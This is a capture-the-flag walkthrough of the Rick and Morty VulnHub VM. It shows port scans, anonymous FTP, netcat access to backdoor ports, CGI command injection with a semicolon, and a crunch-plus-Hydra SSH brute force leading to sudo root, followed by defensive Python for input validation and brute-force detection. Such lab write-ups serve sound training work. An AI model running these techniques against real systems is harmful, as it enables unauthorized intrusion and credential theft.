This VM is based on the TV show Rick and Morty. I am a fan of the show myself, so I had to check it out. It turned out to be quite easy, but I still had fun solving it. Below is my walkthrough for capturing all of the flags.
We start out with an ARP discovery scan (netdiscover) and find our VM:
Currently scanning: Finished!   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
192.168.56.100  08:00:27:89:f9:13      1      60  PCS Systemtechnik GmbH
192.168.56.102  08:00:27:bf:52:95      1      60  PCS Systemtechnik GmbH
We find our target: 192.168.56.102. We then run an Nmap service-version scan (-sV) against the interesting ports and note the open ports and services:
eric@linux:~$ nmap 192.168.56.102 -p21,22,80,9090,13337,22222,60000 -sV

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-05 08:08 CDT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for localhost.localdomain (192.168.56.102)
Host is up (0.00044s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.3
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http       Cockpit web service
13337/tcp open  tcpwrapped
22222/tcp open  ssh        OpenSSH 7.5 (protocol 2.0)
60000/tcp open  tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds
eric@linux:~$
We begin with the low-hanging fruit and capture a few flags.
We notice that the FTP service allows anonymous login. Once logged in, the flag is sitting in the root of the share. We pull it down with get and cat the contents:
eric@linux:~$ ftp 192.168.56.102
Connected to 192.168.56.102.
220 (vsFTPd 3.0.3)
Name (192.168.56.102:eric): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (15.4484 kB/s)
ftp> quit
221 Goodbye.
eric@linux:~$ cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
eric@linux:~$
Flag 1 is found. 10/130 points total:
FLAG{Whoa this is unexpected} - 10 Points
We then connect to port 60000 with netcat and are greeted with "Ricks half baked reverse shell...". Once connected, only a minimal set of commands is accepted; ls and cat work, though, which is enough to find the flag and read its contents:
eric@linux:~$ nc -nv 192.168.56.102 60000
(UNKNOWN) [192.168.56.102] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
# quit
quit: command not found
# ^C
eric@linux:~$
Flag 2 is found. 20/130 points total:
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
Next we move to port 13337. On connecting, the service immediately prints the next flag:
eric@linux:~$ nc -nv 192.168.56.102 13337
(UNKNOWN) [192.168.56.102] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
eric@linux:~$
Flag 3 is found. 30/130 points total:
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Next, we check out port 9090, the Cockpit web service. Browsing to the page, we see our next flag:
Flag 4 is found. 40/130 points total.
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
We then move on to port 80. Running DIRB against it turns up a few directories and files that look interesting:
eric@linux:~$ dirb http://192.168.56.102

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct  5 08:25:56 2017
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:217)
+ http://192.168.56.102/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://192.168.56.102/passwords/
+ http://192.168.56.102/robots.txt (CODE:200|SIZE:126)

---- Entering directory: http://192.168.56.102/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Oct  5 08:25:58 2017
DOWNLOADED: 4612 - FOUND: 3
eric@linux:~$
Specifically, /cgi-bin/, /passwords/ and /robots.txt stand out. We begin with the /passwords/ directory; since directory listing is enabled, we immediately see a FLAG.txt inside.
Flag 5 is found. 50/130 total points.
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
Next, going back to the /passwords/ directory and viewing the source of passwords.html, we notice an HTML comment that reads <!--Password: winter-->. We keep this in our pocket for later enumeration.
We then check /robots.txt, which lists two scripts under the /cgi-bin/ directory: root_shell.cgi and tracertool.cgi.
Accessing /cgi-bin/tracertool.cgi, we see Morty's Machine Tracer Machine:
Poking at the input, we notice that including a semicolon (";") lets us append our own command to the one the script runs, giving command execution. To confirm, I run id, whoami, pwd and a few other simple commands:
And the response is as expected:
I was unsuccessful in gaining a shell with this RCE. I did notice that "cat" was not allowed. However, when running "more" against "/etc/passwd", I noticed that "Summer" was an active user:
Output below:
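The tracertool.cgi bug above is the classic pattern of splicing user input into a shell command line. As an added illustration (hypothetical handler written for this walkthrough, not the VM's actual CGI script), the vulnerable form is shown next to a hardened one that allow-lists the target as an IP address or hostname and execs traceroute without any shell:

```python
import ipaddress
import re
import subprocess
from typing import Optional

# Hypothetical CGI handler, not the VM's tracertool.cgi: the vulnerable form
# interpolates the user-supplied target into one shell string, so an input
# such as "127.0.0.1;id" makes /bin/sh run a second command.
def vulnerable_command(target: str) -> str:
    return f"traceroute {target}"   # would be handed to a shell (shell=True)

# Hardened form: allow-list the input as an IP address or DNS hostname, then
# exec traceroute with an argument vector so no shell ever parses the value.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")

def validate_target(target: str) -> Optional[str]:
    """Return the target if it is a plain IP address or hostname, else None."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    return target if HOSTNAME_RE.match(target) else None

def hardened_argv(target: str) -> Optional[list]:
    """Argument vector for traceroute; None when the input is rejected."""
    safe = validate_target(target)
    return None if safe is None else ["traceroute", safe]

def run_trace(target: str) -> str:
    """Run the trace without a shell; rejected input never reaches exec."""
    argv = hardened_argv(target)
    if argv is None:
        return "Invalid target"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=60)
    return done.stdout or done.stderr
```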
Remembering the password "winter" found earlier, I decided to try SSH to port 22222 as Summer with the password "winter":
eric@linux:~$ ssh Summer@192.168.56.102 -p 22222
Summer@192.168.56.102's password:
Last login: Wed Oct  4 15:31:17 2017
[Summer@localhost ~]$ whoami
Summer
[Summer@localhost ~]$
Success. Now that I have remote access, I did some enumeration. I found inside Summer's home directory another flag:
[Summer@localhost ~]$ pwd
/home/Summer
[Summer@localhost ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$
Flag 6 found. 60/130 total points.
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
I did further enumeration and found two files in Morty's home directory. I copied them over to Summer's home directory and then SCP'd them to my local host:
[Summer@localhost ~]$ ls ../Morty/
journal.txt.zip  Safe_Password.jpg
[Summer@localhost ~]$ cp ../Morty/journal.txt.zip ~
[Summer@localhost ~]$ cp ../Morty/Safe_Password.jpg ~
[Summer@localhost ~]$ ^C
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:journal.txt.zip ~
Summer@192.168.56.102's password:
journal.txt.zip                               100%  414   483.9KB/s   00:00
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:Safe_Password.jpg ~
Summer@192.168.56.102's password:
Safe_Password.jpg                             100%   42KB  17.5MB/s   00:00
eric@linux:~$ ls
burp-hash.sqlite  Documents  FLAG.txt         Music     Public             Templates  vulnhub-rickdiculous
Desktop           Downloads  journal.txt.zip  Pictures  Safe_Password.jpg  Videos
eric@linux:~$
With both files saved locally, I noticed that the journal.txt.zip file was password protected. I tried viewing the jpg and it was just a picture of Rick. I then ran strings against the file and found the password:
I then tried the password "Meeseek" on the zip file and it opened successfully. The contents were a message and another flag:
eric@linux:~$ unzip journal.txt.zip
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password:
  inflating: journal.txt
eric@linux:~$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is:

FLAG: {131333} - 20 Points
eric@linux:~$
Flag 7 found. 80/130 total points, only 50 to go!
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points
Given the journal entry about a drunk Rick rambling about a safe and a password, the flag value "131333" looks like the password to a safe. I also noticed that Rick's home directory contained a directory named RICKS_SAFE, and inside it an executable called "safe". So I copied "safe" to Summer's home directory and SCP'd it to my local host. I then ran the executable with the password "131333" and successfully opened the safe:
[Summer@localhost ~]$ ls ../RickSanchez/
RICKS_SAFE  ThisDoesntContainAnyFlags
[Summer@localhost ~]$ ls ../RickSanchez/RICKS_SAFE/
safe
[Summer@localhost ~]$ cp ../RickSanchez/RICKS_SAFE/safe ~
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:safe ~
Summer@192.168.56.102's password:
safe                                          100% 8704     6.1MB/s   00:00
eric@linux:~$ ./safe 131333
decrypt:        FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.� @
eric@linux:~$
Flag 8 found. 100/130 total points:
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Reading the output of Rick's safe, it says that in case he forgets his password, it follows this pattern: one uppercase character, one digit, and one of the words in his old band's name. He also mentions that "sudo is wheely good", a hint that his account is in the wheel group.
Knowing that Rick Sanchez's old band, with Birdperson and Squanchy, was "The Flesh Curtains", I decide to use "crunch" to generate a password list of one uppercase character and one digit followed by either "Flesh" or "Curtains".
eric@linux:~$ crunch 10 10 -t ,%Curtains -o ./wordlist.curtains
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
eric@linux:~$ crunch 7 7 -t ,%Flesh -o ./wordlist.flesh
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
eric@linux:~$ cat wordlist.curtains > wordlist
eric@linux:~$ cat wordlist.flesh >> wordlist
eric@linux:~$ wc -l wordlist
520 wordlist
eric@linux:~$
With the password list generated (520 candidates: 26 uppercase letters x 10 digits x 2 words), I use Hydra to brute force SSH on port 22222 as RickSanchez and find the correct password:
eric@linux:~$ hydra -l RickSanchez -P wordlist ssh://192.168.56.102 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.56.102:22222/
[22222][ssh] host: 192.168.56.102   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39
eric@linux:~$
With the correct password found, P7Curtains, I SSH into the box as Rick. I then sudo to root per Rick's hint and read the final flag:
eric@linux:~$ ssh RickSanchez@192.168.56.102 -p 22222
RickSanchez@192.168.56.102's password:
Last failed login: Fri Oct  6 01:19:39 AEDT 2017 from 192.168.56.101 on ssh:notty
There were 176 failed login attempts since the last successful login.
Last login: Wed Oct  4 15:46:42 2017
[RickSanchez@localhost ~]$ sudo -i
[sudo] password for RickSanchez:
[root@localhost ~]# more FLAG.txt
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]#
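The login banner above reports 176 failed attempts before the successful one, which is exactly the pattern the Hydra run leaves in the SSH server's auth log. As an added example for the defender's side (written for this walkthrough, not taken from the VM), this detector walks sshd-style log lines, counts failures per source address in a sliding window, and also flags a successful login that immediately follows a burst of failures; the log lines are constructed samples:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the classic sshd syslog line (constructed samples below, not the VM's logs).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$")
THRESHOLD = 10                  # failures from one source inside WINDOW raise an alert
WINDOW = timedelta(seconds=60)

def parse(line):
    """Return (timestamp, result, user, src) or None for lines we do not handle."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["src"]

def detect_bruteforce(lines):
    """Sliding-window count of failures per source; also flags a success that
    follows a burst, which is what a guessed password looks like in the log."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        window = recent[src]
        while window and ts - window[0] > WINDOW:
            window.popleft()
        if result == "Failed":
            window.append(ts)
            if len(window) >= THRESHOLD and src not in alerted:
                alerted.add(src)
                alerts.append(("bruteforce", src, user, len(window)))
        elif window:
            alerts.append(("success_after_failures", src, user, len(window)))
    return alerts

def sample_log():
    """Constructed sample: 12 rapid failures then a success from 192.168.56.101."""
    base = datetime(2017, 10, 5, 9, 19, 8)
    fmt = "%b %d %H:%M:%S"
    lines = [f"{(base + timedelta(seconds=2 * i)).strftime(fmt)} localhost sshd[{2200 + i}]: "
             f"Failed password for RickSanchez from 192.168.56.101 port {51010 + i} ssh2"
             for i in range(12)]
    lines.append(f"{(base + timedelta(seconds=31)).strftime(fmt)} localhost sshd[2300]: "
                 "Accepted password for RickSanchez from 192.168.56.101 port 51300 ssh2")
    lines.append("Oct  5 09:40:02 localhost sshd[2401]: Failed password for Summer "
                 "from 192.168.56.50 port 40000 ssh2")
    return lines
```

Running detect_bruteforce(sample_log()) yields one "bruteforce" alert once the tenth failure lands and one "success_after_failures" alert for the login that follows; in practice the sshd MaxAuthTries and a rate-limiter such as fail2ban would cut the burst short.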
Flag 9 found. 130/130 total points:
FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
FLAG: {Ionic Defibrillator} - 30 points
This was a simple VM, but I still had fun working on it. I enjoy the themes that were provided, especially Rick and Morty. I feel this VM provides a great introduction to pen testing and to using a few common tools for enumeration and for accomplishing specific tasks.
Thanks to Luke for making a fun VM and to VulnHub for hosting these great VMs.
Until next time!
geoda